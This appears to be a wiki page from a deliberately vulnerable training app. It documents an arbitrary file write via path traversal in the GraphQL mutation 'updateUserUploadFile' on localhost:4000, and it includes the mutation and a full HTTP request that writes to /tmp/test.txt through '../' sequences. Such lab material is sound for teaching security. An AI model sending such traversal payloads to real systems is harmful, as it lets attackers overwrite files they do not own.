GraphQL Arbitrary File Write
Sam Sanoop edited this page Dec 15, 2021 · 2 revisions
Arbitrary File Write occurs when an application lets an attacker control the path it writes to. Combined with path traversal (`../` sequences that climb out of the directory the application intended to use), this lets the attacker create or overwrite files anywhere the application's process has write access.

The GraphQL endpoint listening on port 4000 exposes a mutation called `updateUserUploadFile`. Any authenticated user can invoke it, and because its `filePath` argument is used as supplied, the caller can traverse the file system and write `fileContent` to a file of their choosing:
```graphql
mutation {
  updateUserUploadFile(filePath: "../../../../../../tmp/test.txt", fileContent: "foo")
  {
    filePath,
    fileContent
  }
}
```
Example Request

```http
POST /graphql HTTP/1.1
Host: localhost:4000
User-Agent: curl/7.58.0
Accept: */*
content-type: application/json
Content-Length: 184
Connection: close

{"query": " mutation {\r\n updateUserUploadFile(filePath: \"../../../../../../tmp/test.txt\",fileContent:\"foo\")\r\n {\r\n\t\tfilePath,\r\n fileContent\r\n }\r\n \r\n \r\n}"}
```